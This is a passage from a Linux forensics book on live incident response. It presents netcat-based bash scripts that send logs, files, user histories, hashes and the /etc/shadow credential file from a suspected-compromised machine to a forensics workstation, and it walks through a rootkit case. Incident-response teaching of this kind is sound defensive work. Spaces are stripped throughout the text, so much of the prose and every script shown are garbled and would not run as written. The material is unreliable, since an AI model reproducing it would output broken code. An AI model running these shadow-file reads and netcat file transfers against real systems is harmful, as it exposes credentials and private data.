[-z“$RPORT”]&&{exportRPORT=4444;}
usage(){
echo“usage:$0<commandorscript>”
echo“Simplescripttosendalogentrytolistener”
exit1
}
#didyouspecifyacommand?
if[$#-lt1];then
usage
else
echo-e“++++Sendinglogfor$@at$(date)++++\n$($@)\n–-end–-\n”|nc$RHOST$RPORT
fi
ThescriptstartsoutwithacoupleoflinesthatwillsetRHOSTandRPORTtodefaultvaluesiftheyhavenotalreadybeenset.Theselinesdemonstrateapowerfultechniquetouseinyourshellscriptsknownasshortcircuiting.Theline[-z“$RHOST”]&&{exportRHOST=localhost;}consistsof twostatementsseparatedbythe logicalANDoperator. The first half tests theRHOST environment variable to see if it is zero(nullorunset).Noticethatthevariablecompletewiththeleading$isenclosedindoublequotes. This forces the shell to interpret this value as a string for the test to work asexpected. If the statement doesn’t evaluate to true there is no reason tobotherwith thesecondhalfofthelinesoitisskipped(shortcircuited).Thecurlybracketsinthesecondhalfareusedtoexplicitlygroupeverythingtogetherinastatement.
NOTJUSTFORSCRIPTSShortcircuitingisusefulinmanyplacesShort circuiting isn’t just for scripts. It can be usefulwhen you have a series ofcommands that might take a while to run when each command depends on thesuccess of the command before it. For example, the commandsudoapt-getupdate&&sudoapt-get-yupgradewillfirstupdatethelocalsoftwarerepositorycacheand thenupgradeanypackages thathavenewerversions.The-yoptionautomaticallysaysyestoanyprompts.Ifyouareunabletoconnecttoyourrepositoriesforsomereasontheupgradecommandisneverexecuted.
Another common use of this technique is building software from sourcewhenyoudonotwanttositaroundandwaittoseeifeachstagecompletessuccessfully.Manypackages requireaconfigure script tobe run that checksdependenciesandoptionally sets some non-default options (such as library and tool locations),followedbyamake andsudomakeinstall. It can take some time for allthree stages to complete. The command./configure&&make&&sudomakeinstallcanbeusedtodothisallononeline.
The only real work done in this script is in the echo line near the bottom.We havealreadyseentheechocommand,butthereareafewnewthingsonthisline.First,echohasa-eoption.Theoptionenablesinterpretationofbackslashcharacters.Thisallowsustoputnewlines(\n)inourstringinordertoproducemultiplelinesofoutputwithasingleechocommand.
Thereareacouplereasonswhywewanttouseasingleechocommandhere.First,wewillbepassing(pipingactually)theresultstothenetcattalkerwhichwillsendthisdata
toour forensicsworkstation.Wewant thisdoneasoneatomic transaction.Second, thisallowsamorecompactandeasilyunderstoodscript.
There is also something new in the echo string, the $@variable. $@ is equal to theentire setof command lineparameterspassed to the script.We firstuse$@ tocreate aheaderthatreads“++++Sendinglogfor{commandwithparameters}at{date}++++”.Wethenuseour$()trickyetagaintoactuallyrunthecommandandinsertitsoutputintoourstring.Finally,a“–-end–-”footerisaddedafterthecommandoutput.
Thelastclientscriptisusedtosendfilestotheforensicsworkstationforanalysis.Itwillmakealogentry,thensendthefilenametotheappropriateport,thendelayafewsecondstogivetheservertimetocreatealistenertoreceivethefile,andfinallysendthefile.Thescriptfordoingthisfollows.#send-file.sh
#
#Simplescripttosendanewfile
#tolisteneronforensicsworkstation.Intendedtobe
#usedaspartofinitialliveresponse.
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
#defaultsprimarilyfortesting
[-z“$RHOST”]&&{exportRHOST=localhost;}
[-z“$RPORT”]&&{exportRPORT=4444;}
[-z“$RFPORT”]&&{exportRFPORT=5555;}
[-z“$RFTPORT”]&&{exportRFTPORT=5556;}
usage(){
echo“usage:$0<filename>”
echo“Simplescripttosendafiletolistener”
exit1
}
#didyouspecifyafile?
if[$#-lt1];then
usage
fi
#logit
echo“Attemptingtosendfile$1at$(date)”|nc$RHOST$RPORT
#sendname
echo$(basename$1)|nc$RHOST$RFPORT
#giveittime
sleep5
nc$RHOST$RFTPORT<$1
Aswiththeotherclientscripts,thereisnoshe-bangatthebeginningofthescriptsoit
mustberunmanuallyby typingbash./send-file.sh{filename}.The shortcircuitingtechniqueisagainusedtosetenvironmentvariablestodefaultsiftheyhavenotbeenset.Thescript isverystraightforward.First, thenumberofparameterspassedinischecked,andifnofilenamewaspassedin,theusagestatementisdisplayed.Second,thefilename is echoed to the filename listenerwhichcauses the server to start a listener toreceivethefile.Notethatthebasenamecommandisusedtostripanyleadingpathfromthe filename (the fullpathdoesappear in the log,however).Third, the script sleeps forfivesecondstoallowtheservertimetostartthelistener.Thisisprobablynotneeded,butitiswellworthwaitingafewsecondstohaveareliablescript.Finally,thefileissenttothefilelistenerandthenthescriptexits.
INTRODUCINGOURFIRSTSUBJECTSYSTEMThroughoutthisbookwewillworkthroughafewexamplesubjectsystems.Ifyouwishtofollow along, youmay download the example images from http://philpolstra.com. Thiswebsiteisalsotheplacetogetupdatesandothermaterialsfromthisbook(andalsopastand future books).To keep things simple Iwill install this example system in a virtualmachine using VirtualBox running on my Ubuntu 14.04 computer. Recall that I saidearlierinthisbookthatusingaUSB2.0responsedriveislessproblematicwhentryingtomountthedriveinavirtualmachine.
OurfirstexampleisalsoanUbuntu14.0464-bitsystem.Youhavereceivedacallfromyournewclient,adevelopmentshopknownasPhil’sFuturisticEdutainment(PFE)LLC.Yourinitialinterviewsrevealedthatoneoftheleaddeveloper’scomputershasbeenactingstrangelyandPFEsuspects themachinehasbeenhacked.Theyhaveno in-houseLinuxforensicspeoplesoyouwerecalledin.OneofthethingsthatseemstobehappeningonthesubjectsystemisthatwarningsuchasthosefromFigure2.13keeppoppingup.
FIGURE2.13
Suspicioussystemwarningsonsubjectsystem.
Oneof the first thingsyouneed todowith the subject system ismountyourknown-goodbinaries.ThestepsrequiredareshowninFigure2.14.Theifconfigutilityisalsorunasaverificationthateverythingisworkingcorrectly.
FIGURE2.14
Mountingaresponsedriveandloadingaknown-goodshellandbinaries.
Asequenceofcommandstoruntheknow-goodbinariesandthenusetheaboveclientscripts is shown in Figure 2.15. Some of the results that appear on the forensicsworkstationareshowninFigure2.16andFigure2.17.
FIGURE2.15
Mountingknow-goodbinariesandthenrunningsomeclientscriptsonthesubjectsystem.
FIGURE2.16
PartiallogentryforforthecommandsshowninFigure2.15.
FIGURE2.17
FilescreatedbythecommandsinFigure2.15.
COLLECTINGVOLATILEDATAThereisplentyofvolatiledatathatcanbecollectedfromthesubjectsystem.Collectingthisdatawillhelpyoumakeapreliminarydeterminationastowhetherornottherewasanincident. Some of the more common pieces of data you should collect are discussedbelow.
DateandtimeinformationOneof the first thingsyouwant to collect is thedate and time information.Why?Thesubjectsystemmightbeinadifferenttimezonefromyourusuallocation.Also,computerclocksareknowntobebadatkeepinggoodtime.Ifthesystemhasnotbeensynchronizedwithatimeserverrecentlytheclockcouldbeoff,andyouwillwanttonotethisskewtoadjust times inyour reports.Despite itsname, thedate commandoutputsnotonly thedate,butthetimeandtimezoneaswell.
OperatingsystemversionYouwill need to know the exact operating system and kernel version you are runningshouldyou laterdecide todomemoryanalysis.Theuname-acommandwillprovideyouwith this information and also themachine name and kernel build timestamp. TheresultsofrunningthiscommandonthePFEsubjectsystemareshowninFigure2.18.
FIGURE2.18
Resultsofrunningunameonasubjectsystem.
NetworkinterfacesWhat network interfaces are on the machine? Is there anything new that shouldn’t bethere?Thismightsoundlikeastrangequestion,butanattackerwithphysicalaccesscouldadd awireless interface orUSB interface pretty easily.Other strange but less commoninterfacesareapossibility.
Whataddresseshavebeenassignedtovariousinterfaces?Whataboutthenetmask?Hassomeonetakenanetworkinterfacedowninordertohavetrafficroutedthroughsomethingtheycontrolormonitor?Allofthesequestionsareeasilyansweredusingtheifconfig-acommand.Theresultsofrunningifconfig-aonthesubjectsystemareshowninFigure2.19.
FIGURE2.19
Resultsfromtheifconfig-acommand.
NetworkconnectionsWhatothermachinesaretalkingwiththesubjectmachine?Arethereanysuspiciouslocalnetworkconnections?IsthesystemconnectingtosomethingontheInternetwhenitisnotsupposedtohavesuchaccess?Thesequestionsandmorecanbeansweredbyrunningthenetstat-anpcommand.Theoptionsa,n,andpareusedtospecifyallsockets,useonly numeric IPs (do not resolve host names), and display process identifiers andprograms,respectively.
OpenportsArethereanysuspiciousopenports?Isthesystemconnectingtoportsonanothermachinethatisknowntobeusedbymalware?Thesequestionsarealsoeasilyansweredbyrunningthe netstat -anp command. The results of running this command on the subjectsystemareshowninFigure2.20.
FIGURE2.20
Resultsofrunningnetstat-anponthesubjectsystem.
Malwarecanaffectanyofthecommandsyouarerunningduringyourinitialscanofthesubject system. This is true even with know-good binaries as underlying memorystructuresmaybealteredbyrootkitsandthelike.Theresultsofrunningnetstat-anpon thesubjectsystemaftera rootkit is installedareshowninFigure2.21.Note that thenetstatprocessiskilledandasystemwarningisalsodisplayed.Everycommandthatfailslikethisincreasestheprobabilitythatthemachinehasbeencompromised.
FIGURE2.21
Theresultsofrunningnetstat-anpafterarootkithasbeeninstalled.
ProgramsassociatedwithvariousportsSomeportsareknowntobehometomaliciousservices.Evensafeportscanbeusedbyother processes.The output ofnetstat-anp can be used to detect programs usingportstheyshouldnotbeusing.Forexample,malwarecoulduseport80asitwilllooklikewebtraffictoacasualobserver.
OpenFilesIn addition to asking which programs are using what ports, it can be insightful to seewhich programs are opening certain files. Thelsof-V (list open files with Verbosesearch)commandprovidesthisinformation.TheresultsofrunningthiscommandonthesubjectsystemareshowninFigure2.22.Aswiththenetstatcommand,thiswillfailifcertainrootkitsareinstalled.
FIGURE2.22
Results of running lsof -V on subject system. Note that this command failed when it was rerun afterinstallationofarootkit(XingYiQuan).
RunningProcessesArethereanysuspiciousprocessesrunning?Are there thingsbeingrunby therootuserthat should not be? Are system accounts that are not allowed to login running shells?These questions andmore can be answered by running theps-ef command. The -eoption lists processes for everyone and -f gives a full (long) listing. This is another
command that might fail if a rootkit has been installed. Partial results of running thiscommandonthesubjectsystemareshowninFigure2.23.
FIGURE2.23
Resultsofrunningps-efonthesubjectsystem.
RoutingTablesIs your traffic being rerouted through an interface controlled and/or monitored by anattacker?Haveanygatewaysbeenchanged?Theseandotherquestionscanbeansweredby examining the routing table.There ismore thanoneway to obtain this information.Twoofthesewaysaretousethenetstat-rnandroutecommands. I recommendrunningbothcommandsasarootkitmightalertyoutoitspresencebyalteringtheresultsofoneorbothofthesecommands.Ifyougetconflictingresultsitisstrongevidenceofacompromise.The results of running both of these commands on the subject system areshowninFigure2.24.
FIGURE2.24
Resultsofrunningnetstat-rnandrouteonthesubjectsystem.
MountedfilesystemsAreanysuspiciousvolumesmountedon thesystem?Isoneof thefilesystemssuddenlyfillingup?Whatarethepermissionsandoptionsusedtomounteachpartition?Arethereunusualtemporaryfilesystemsthatwillvanishwhenthesystemisrebooted?Thedf(diskfree)andmountcommandscananswerthesetypesofquestions.
Aswithmanyothercommands,arootkitmightaltertheresultsofoneorbothofthesecommands. Whenever two utilities disagree it is strong evidence of a compromisedsystem.TheresultsofrunningdfandmountonthesubjectsystemareshowninFigure2.25.
FIGURE2.25
Resultsofrunningdfandmountonthesubjectsystem.
LoadedkernelmodulesAre there any trojaned kernelmodules? Are there any device drivers installed that theclientdoesnotknowanythingabout?Thelsmod commandprovides a list of installedkernelmodules.PartialresultsfromrunninglsmodareshowninFigure2.26.
FIGURE2.26
Partialresultsofrunninglsmodonthesubjectsystem.
UserspastandpresentWhoiscurrentlyloggedin?Whatcommanddideachuserlastrun?Thesequestionscanbeansweredbythewcommand.Forthosewhoarenotfamiliar,w issimilartothewhocommand,butitprovidesadditionalinformation.ResultsforthewcommandareshowninFigure2.27.
FIGURE2.27
Resultsofrunningthewcommandonthesubjectsystem.
Whohasbeenlogginginrecently?Thisquestionisansweredbythelastcommand.Alist of failed login attempts can be obtained using the lastb command. The lastcommandlistswhenuserswereloggedin,ifthesystemcrashedorwasshutdownwhileauserwasloggedin,andwhenthesystemwasbooted.PartialresultsfromrunninglastareshowninFigure2.28.NotethattherearemultiplesuspiciousloginsonMarch9th.Anewuserjohnnwhoshouldnotexisthasloggedonashastheligthdmsystemaccount.
FIGURE2.28
Partial results of running last on the subject system. The logins by johnn and lightdm are indicators of acompromise.
TheresultsfromrunninglastbonthesubjectsystemareshowninFigure2.29.FromthefigureitcanbeseenthatJohnstruggledtorememberhispasswordonMay20th.ThemuchmoreinterestingthingthatcanbeseenisthatthelightdmaccounthadafailedloginonMarch9th.Whenyoucombinethis informationwiththeresultsfromlast, itwouldappearthatanattackerwastestingthisnewaccountanddidnotcorrectlysetthingsupthefirsttime.Furthermore,itseemslikelythejohnaccountwasusedbytheattacker.
FIGURE2.29
Arethereanynewaccountscreatedbyanattacker?Hassomeonemodifiedaccountstoallow system accounts to login?Was the system compromised because a user had aninsecurepassword?Examinationofthe/etc/passwdand/etc/shadowfileshelpyouanswerthesequestions.
A partial listing of the /etc/passwd file can be found in Figure 2.30. Notice thehighlightedportionisforthejohnnaccount.ItappearsasthoughanattackercreatedthiscountandtriedtomakeitlookalotlikethejohnaccountforJohnSmith.Alsoofnoteisthehiddenhomedirectoryforjohnnlocatedat/home/.johnn.
FIGURE2.30
Partial listingof/etc/passwdfilefromsubjectsystem.Thehighlightedlineisforanewjohnnaccountwhichappearsatfirstglancetobethesameasjohn.Notethehiddenhomedirectory.
Looking at the line for the lightdm account in Figure 2.30we observe that the loginshellhasbeensetto/bin/false.Thisisacommontechniqueusedtodisableloginofsomesystemaccounts.From thelast command results it is clear that this userwas able tologin.Thisiscauseforinvestigationofthe/bin/falsebinary.
PuttingittogetherwithscriptingThereisnogoodreasontotypeallofthecommandsmentionedabovebyhand.Sinceyoualready are mounting a drive with your know-good binaries, it makes sense to have ascript todoall theworkforyouonyourresponsedrive.Asimplescript foryour initialscanfollows.Thescriptisstraightforwardandprimarilyconsistsofcallingthesend-log.shscriptpresentedearlierinthischapter.#initial-scan.sh
#
#Simplescripttocollectbasicinformationaspartof
#initialliveincidentresponse.
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
usage(){
echo“usage:$0[listeninghost]”
echo“Simplescripttosendalogentrytolistener”
exit1
}
#didyouspecifyalistenerIP?
if[$#-gt1]||[“$1”==“—help”];then
usage
fi
#didyouspecifyalistenerIP?
if[“$1”!=“”];then
sourcesetup-client.sh$1
fi
#nowcollectsomeinfo!
send-log.shdate
send-log.shuname-a
send-log.shifconfig-a
send-log.shnetstat-anp
send-log.shlsof-V
send-log.shps-ef
send-log.shnetstat-rn
send-log.shroute
send-log.shlsmod
send-log.shdf
send-log.shmount
send-log.shw
send-log.shlast
send-log.shlastb
send-log.shcat/etc/passwd
send-log.shcat/etc/shadow
SUMMARYWehavecoveredquiteabitinthischapter.Waysofminimizingdisturbancetoasubjectsystemwhiledeterminingiftherewasanincidentwerediscussed.Severalscriptstomakethiseasywerepresented.Weendedthischapterwithasetofscriptsthatcanallowyoutodetermineiftherewasacompromiseinmereminutes.Inthenextchapterwewilldiscussperformingafullliveanalysisonceyouhavedeterminedthatanincidentoccurred.
CHAPTER
3LiveAnalysisINFORMATIONINTHISCHAPTER:
FilemetadataTimelinesUsercommandhistoryLogfileanalysisHashingDumpingRAMAutomationwithscripting
THEREWASANINCIDENT:NOWWHAT?Basedoninterviewswiththeclientandlimitedliveresponseyouareconvincedtherehasbeenanincident.Nowwhat?Nowitistimetodelvedeeperintothesubjectsystembeforedecidingifitmustbeshutdownfordeadanalysis.TheinvestigationhasnowmovedintothenextboxasshowninFigure3.1.
FIGURE3.1
TheHigh-levelInvestigationProcess.
Somesystemscanbeshutdownwithminimalbusinessdisruption.Inourexamplecasethesubjectsystemisadeveloperworkstationwhichisnormallynotterriblypainfultotake
offline. The only person affected by this is the developer. His or her productivity hasalreadybeenaffectedbymalwarewehavediscovered.InacaselikethisyoumightdecidetodumptheRAMandproceedtodeadanalysis.Ifthisiswhatyouhavechosentodo,youcansafelyskipaheadtothesectionofthischapterondumpingRAM.
GETTINGFILEMETADATAAtthispointintheinvestigationyoushouldhavearoughideaofapproximatelywhenanincidentmayhaveoccurred. It is not unusual to startwith some systemdirectories andthen go back to examine other areas based on what you find. It is the nature ofinvestigationsthatyouwillfindlittlebitsofevidencethatleadyoutootherlittlebitsofevidenceandsoon.
A good place to start the live analysis is to collect file metadata which includestimestamps, permissions, file owners, and file sizes. Keep inmind that a sophisticatedattackermight alter this information. In the dead analysis section of this bookwewilldiscusswaysofdetectingthisandhowtorecoversomemetadatathatisnoteasilyalteredwithoutspecializedtools.
Asalways,wewillleveragescriptingtomakethistaskeasierandminimizethechancesformistakes.ThefollowingscriptbuildsonshellscriptsfromChapter2inordertosendfilemetadatatotheforensicsworkstation.Thedataissentinsemicolondelimitedformattomakeiteasiertoimportintoaspreadsheetforanalysis.#send-fileinfo.sh
#
#Simplescripttocollectfileinformationaspartof
#initialliveincidentresponse.
#Warning:Thisscriptmighttakealongtimetorun!
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
usage(){
echo“usage:$0<startingdirectory>”
echo“Simplescripttosendfileinformationtoaloglistener”
exit1
}
if[$#-lt1];then
usage
fi
#semicolondelimitedfilewhichmakesimporttospreadsheeteasier
#printfisaccessdate,accesstime,modifydate,modifytime,
#createdate,createtime,permissions,userid,username,
#groupid,groupname,filesize,filenameandthenlinefeed
#ifyouwantnicecolumnlabelsinyourspreadsheet,pastethefollowing
#line(minus#)atstartofyourCSVfile
#AccessDate;AccessTime;ModifyDate;ModifyTime;CreateDate;CreateTime;Permissions;UID;Username;GID;Groupname;Size;File
send-log.shfind$1-printf“%Ax;%AT;%Tx;%TT;%Cx;%CT;%m;%U;%u;%G;%g;%s;%p\n”
Thescripttakesastartingdirectorybecauseyouprobablywanttolimitthescopeofthiscommandasit takesawhiletorun.Alloftherealworkinthisscript is intheverylastline.Manyreadershavelikelyusedthefindutilityinitssimplestformwhichprintsoutthenamesoffoundfiles.Thefindcommandiscapableofsomuchmoreaswewillseelaterinthischapter.Heretheprintfoptionhasbeenusedwhichallowsfoundfileattributestobeprintedinaspecifiedformat.Consultthefindmanpage(accessiblebytypingmanfind ina terminal) for thecomplete listof formatcodes ifyouwant tocustomize thisscript.
AportionofwhatisreceivedbytheforensicsworkstationwhenthisscriptisrunonthesubjectsystemisshowninFigure3.2.Thehighlightedlineisfor/bin/false.Accordingtothis information it was modified onMarch 9th, the date of the suspected compromise.Looking five lines above this entry reveals that false is exactly the same size as bashwhichmakesnosenseforaprogramthatonlyexiststoreturnavalue.Thefalseprogramisfourtimesthesizeofthetrueprogramwhichalsoexistsonlytoreturnavalue.
FIGURE3.2
Partialresultsfromrunningsend-fileinfo.shon/bindirectory.Thehighlightedlineindicatesthat/bin/falsewasmodified about the time of the compromise. Also suspicious is the fact that the file sizematches that of/bin/bashfivelinesaboveit.
USINGASPREADSHEETPROGRAMTOBUILDATIMELINEShouldyoudecidetoperformafulldeadanalysisacompletetimelinecanbebuiltusingtechniquesdescribedlaterinthisbook.Atthisstageoftheinvestigationhavingafilelist
thatcanbe sortedbymodification,creation,andaccess timesbasedonoutput from thescript in theprevioussectioncanbehelpful.Whilenotasniceasaproper timeline thatintertwinesthesetimestamps,itcanbecreatedinamatterofminutes.
Thefirststep is toopen the log.txt file for thecase inyourfavorite texteditoron theforensicsworkstation. If youwould like headers on your columns (recommended) thenalsocutandpaste thecomment from thesend-fileinfo.shscript,minus the leading#,asindicated.Savethefilewitha.csvextensionandthenopenitinLibreOfficeCalc(oryourfavorite spreadsheet program).Youwill begreetedwith a screen such as that shown inFigure3.3.Clickoneachcolumnandsetitstypeasshowninthefigure.Failuretodothiswillcausedatesandtimestobesortedalphabeticallywhichisnotwhatyouwant.
FIGURE3.3
ImportingaCSV filewith filemetadata intoLibreOfficeCalc.Note thateachcolumn typeshouldbeset to
allowforpropersorting.
Oncethefilehasbeenimporteditiseasilysortedbyselectingallofthepertinentrowsand then choosing sort from the data menu. The columns are most easily selected byclickinganddraggingacrossthecolumnletters(whichshouldbeA-M)atthetopofthespreadsheet.TheappropriatesortcommandstosortbydescendingaccesstimeisshowninFigure3.4.
FIGURE3.4
Sortingfilemetadatabyaccesstime.
Asimilar technique canbeused to sort bymodificationor creation time. Itmight bedesirable to copy andpaste this spreadsheet ontomultiple tabs (technicallyworksheets)and save the resulting workbook as a regular Calc file. The easiest way to copyinformationtoanewsheetistoclickintheblanksquareintheupperleftcorner(abovethe1 and to the left of theA), pressControl-C, go to the new sheet, click in the sameupperlefthandsquare,andthenpressControl-V.
ThecreationtimetabofsuchaspreadsheetforoursubjectsystemisshowninFigure3.5.Thehighlightedrowsshowthatthesuspicious/bin/falsefilewascreatedaroundthetimeofourcompromiseand that theXingYiQuanrootkithasbeen installed.Note thatsomeoftherootkitfileshaveaccesstimestampsaroundthetimeofthecompromise,yetthey have been created and modified later, at least according to the possibly altered
metadata.
FIGURE3.5
Filemetadataforthe/bindirectorysortedbycreationtimestamps.Thehighlightedrowsshowthat/bin/falsewasalteredaboutthetimeofourcompromiseandthattheXingYiQuanrootkitappearstobeinstalled.
EXAMININGUSERCOMMANDHISTORYThebash(BourneAgainShell)shellisthemostpopularoptionamongLinuxusers.Itisfrequently the default shell. Bash stores users’ command histories in the hidden.bash_historyfileintheirhomedirectories.Thefollowingscriptusesthefindutilitytosearchforthesehistoryfilesinhomedirectories,includingtherootuser’shomedirectoryof/root.Asophisticatedattackerwilldeletethesesfilesand/orsettheirmaximumsizetozero.Fortunatelyfortheinvestigator,notallattackersknowtodothis.#send-history.sh
#
#Simplescripttosendalluserbashhistoryfilesaspartof
#initialliveincidentresponse.
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
usage(){
echo“usage:$0“
echo“Simplescripttosenduserhistoryfilestoaloglistener”
exit1
}
if[$#-gt0];then
usage
fi
#findonlyfiles,filenameis.bash_history
#executeecho,cat,andechoforallfilesfound
send-log.shfind/home-typef-regextypeposix-extended-regex\
‘/home/[a-zA-Z.]+/.bash_history’\
-exececho-e“–dumpinghistoryfile{}–\n”\;\
-execcat{}\;-exececho-e“–endofdumpforhistoryfile{}–\n”\;
#repeatfortheadminuser
send-log.shfind/root-typef-maxdepth1-regextypeposix-extended\
-regex‘/root/.bash_history’\
-exececho-e“–dumpinghistoryfile{}–\n”\;\
-execcat{}\;-exececho-e“–endofdumpforhistoryfile{}–\n”\;
This code requires a little explanation. The easiest new thing to explain is the \charactersattheendofsomelines.Thesearelinecontinuationcharacters.Thisallowsthescript to be more readable, especially when printed in this book. This same linecontinuationcharactercanbeusedinotherscriptinglanguagessuchasPython,althoughitisnotnecessarilythepreferredmethodforthoselanguages.
Nowthatwehavedescribedthe\characters,let’stacklesomeoftheharderpartsofthisscript.We’llbreakdownthefindcommandpiecebypiece.Findhastheabilitytosearchby file type. The commandfind/home-typef instructsfind to search under/homeforregularfiles(notdirectories,devices,etc.).
Inadditiontofindingfilesbyname,findallowsregularexpressionstobeusedforthefilename. If you are not familiar with regular expressions, they are powerful ways ofdefiningpatterns.Acomplete tutorialon regular expressions, alsocalled regexs, iswellbeyond the scope of this book. There are a number of online resources, such ashttp://www.regular-expressions.info/, for those wanting to know more. The bookMasteringRegularExpressionsbyJeffreyE.F.Friedl(O’Reilly,2006)isagreatresourceforthosethatpreferabook.
In regular expressions we have characters that match themselves (literals) and thosewith specialmeaning (metacharacters).Within the setofmetacharacterswehave thingsthatmatch,anchors,andquantityspecifiers.Occasionallywewanttotreatmetacharactersas literals and we do this by escaping them. Escaping a character is as simple asprependingthe\characterbeforeit.
Some of the more common matching metacharacters are character classes (lists ofcharactersinsidesquarebrackets)andtheperiodwhichmatchanycharacterinthelistandany character except a newline, respectively. Because the period is a metacharacter, itmust be escaped when you want to match a period, as is the case with the regularexpressioninthisscript.
Someof themost usedquantity specifiers include*,+, and ?which indicate zero ormore,oneormore, andzeroorone, respectively.Quantity specifiers apply to the thing
(literalcharacter,metacharacter,orgrouping) justbefore them.Forexample, the regularexpressionA+meansoneormorecapitalA’s.Asanotherexample, [A-Z]?[a-z]+wouldmatchanywordthatiswritteninalllowercaseletterswiththepossibleexceptionofthefirstletter(breakingitdownitiszerooroneuppercaselettersfollowedbyoneormorelowercaseletters).
Itiseasytounderstandtheregularexpressioninourscriptifwebreakitdownintothreeparts. The first part “/home/” is a literal string that matches the main directory whereusers’ home directories are stored. The second part “[a-zA-Z.]+”matches one ormorelower case letters orupper case letters or aperiod.This shouldmatchvalidusernames.The final portion is another literal string, but this timewith a period escaped. In otherwords,theregularexpression“/.bash_history”matchestheliteralstring“/.bash_history”.
Theremainderof thefindcommandruns threecommandsforeachfile foundusingthe -exec option. Anywhere you see “{}” thefind command will replace it with thenameofthefilefound.Onceyouknowthat,itiseasytounderstandhowthisworks.Firstweechoaheaderthatincludesthefilename.Thenwecat(type)thefilewiththesecond-exec.Finally,afooterisaddedtotheoutput.Afteralloftheregularuserhomedirectorieshavebeenscanned,aslightlymodifiedfindcommandisruntoprintouttherootuser’sbashhistoryifitexists.
AportionofthejohnusersbashhistoryisshowninFigure3.6.Itwouldappearthattheattackertriedtousesed(scriptededitor)tomodifythe/etc/passwdfile.Itseemsthatheorshehadsometroubleastheyalsolookedatthemanpageforsedandultimatelyjustusedvi. A few lines down in this history filewe see theXingYiQuan rootkit beinginstalledand thels commandbeingused toverify that thedirectory intowhich itwasdownloadedishidden.
FIGURE3.6
Partofjohnuser’sbashhistory.Thelinesnearthetopindicateanattempttomodifythenewjohnnaccountinformation.Furtherdownweseecommandsassociatedwiththeinstallationofarootkit.
GETTINGLOGFILESUnlikeWindows,Linuxstillusesplaintextlogfilesinmanycases.Theselogscanusuallybe found in the /var/log directory. Some are found in this directory while others arelocated in subdirectories. Most logs will have a .log extension or no extension. It iscommonpracticetosaveseveralolderversionsofcertainlogs.Thesearchivedlogshavethesamebase filename,but .n,wheren isapositivenumber,added.Someof theolderlogsarealsocompressedwithgzipgivingthema .gzextensionaswell.Forexample, ifthe log file is named “my.log” the most recent archivemight be “my.log.1” and olderarchivesnamed“my.log.2.gz”,“my.log.3.gz”,etc.
Thescriptbelowwillusethefindutilitytoretrievecurrentlogfilesfromthesubjectsystemandsendthemtotheforensicsworkstation.Ifafterexaminingthecurrentlogsyoudetermine theydon’t cover a relevant timeperiod for your investigation (whichusuallymeanstheyshouldhavecalledyoumuchearlier)youcaneasilyusethesend-file.shscriptpresentedearliertosendwhateveradditionallogsyoudeemnecessary.Ofcourse,ifyouhavemadethedecisiontoperformadeadanalysisyouarelikelybetteroffjustwaitingtolookattheselaterasthetoolsavailablefordeadanalysismakethismucheasier.#send-logfiles.sh
#
#Simplescripttosendalllogsaspartof
#initialliveincidentresponse.
#Warning:Thisscriptmighttakealongtimetorun!
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
usage(){
echo“usage:$0“
echo“Simplescripttosendlogfilestoaloglistener”
exit1
}
if[$#-gt0];then
usage
fi
#findonlyfiles,excludefileswithnumbersastheyareoldlogs
#executeecho,cat,andechoforallfilesfound
send-log.shfind/var/log-typef-regextypeposix-extended\
-regex‘/var/log/[a-zA-Z.]+(/[a-zA-Z.]+)*’\
-exececho-e“–dumpinglogfile{}–\n”\;\
-execcat{}\;-exececho-e“–endofdumpforlogfile{}–\n”\;
Thisscriptusesthesameelementsasthepreviousbashhistorygrabbingscriptwithoneexception.Thereissomethingnewintheregularexpression.Parentheseshavebeenusedtogroupthingstogetherinordertoapplythe*quantifier(zeroormore).Ifwebreaktheregularexpressionintothreepartsitiseasiertounderstand.
Thefirstpart“/var/log/”matchestheliteralstringthatisthenormaldirectorywherelogfiles can be found. The second chunk “[a-zA-Z.]+” matches one or more letters or aperiod.Thiswillmatchanycurrentlogfilesordirectorieswhileexcludingarchivedlogs(because numbers are not included in the square brackets). The final portion “(/[a-zA-Z.]+)*”isthesameasthesecondchunk,butitisenclosedinparenthesesandfollowedby*.Thisgroupingcausesthe*quantifier(zeroormore)tobeappliedtoeverythingintheparentheses.Thezerocasematcheslogsthatarein/var/log,theonecasematcheslogsoneleveldowninasubdirectory,etc.
PartofthelogfilesforoursubjectsystemareshowninFigure3.7.Intheupperpartofthe figure you can see the tail of the dmesg (devicemessage) log.Notice that this logdoesn’tusetimestamps.Rather,itusessecondssinceboot.Thestartofthesyslog(systemlog) is shown in the lower portion of the figure. It can be seen that syslog does usetimestamps.Thereareotherlogsthatprovidenotimeinformationwhatsoever.Similartobashhistory,suchlogsonlyprovidetheorderinwhichthingsweredone.
FIGURE3.7
Partof the log filesdump from thesubjectsystem.Notice thatsome logscontain timestampswhileotherscontainsecondssincebootornotimeinformationatall.
COLLECTINGFILEHASHESThereareanumberofhashdatabasesontheInternetthatcontainhashesforknown-good
andknown-badfiles.Isthisthebestwayoffindingmalware?Absolutelynot!Thatsaid,checking hashes is super quick compared to analyzing fileswith anti-virus software orattemptingtoreverseengineerthem.Agoodhashdatabaseallowsyoutoeliminatealargenumberof files fromconsideration.Occasionallyyoumight findmalwareusinghashes.Reducing the number of files you are forced to look at by eliminating know-good filesfromyouranalysisismuchmoreuseful,however.
Two popular free hash databases includehttps://www.owasp.org/index.php/OWASP_File_Hash_Repository by the Open WebApplicationsSecurityProject(OWASP),andhttp://www.nsrl.nist.gov/ fromtheNationalInstitute of Standards and Technology. As of this writing they both support MD5 andSHA-1. Should they support moremodern algorithms in the future the script below iseasilymodified.#send-sha1sum.sh
#
#Simplescripttocalculatesha1sumaspartof
#initialliveincidentresponse.
#Warning:Thisscriptmighttakealongtimetorun!
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
usage(){
echo“usage:$0<startingdirectory>”
echo“SimplescripttosendSHA1hashtoaloglistener”
exit1
}
if[$#-lt1];then
usage
fi
#findonlyfiles,don’tdescendtootherfilesystems,
#executecommandsha1sum-b<filename>forallfilesfound
send-log.shfind$1-xdev-typef-execsha1sum-b{}\;
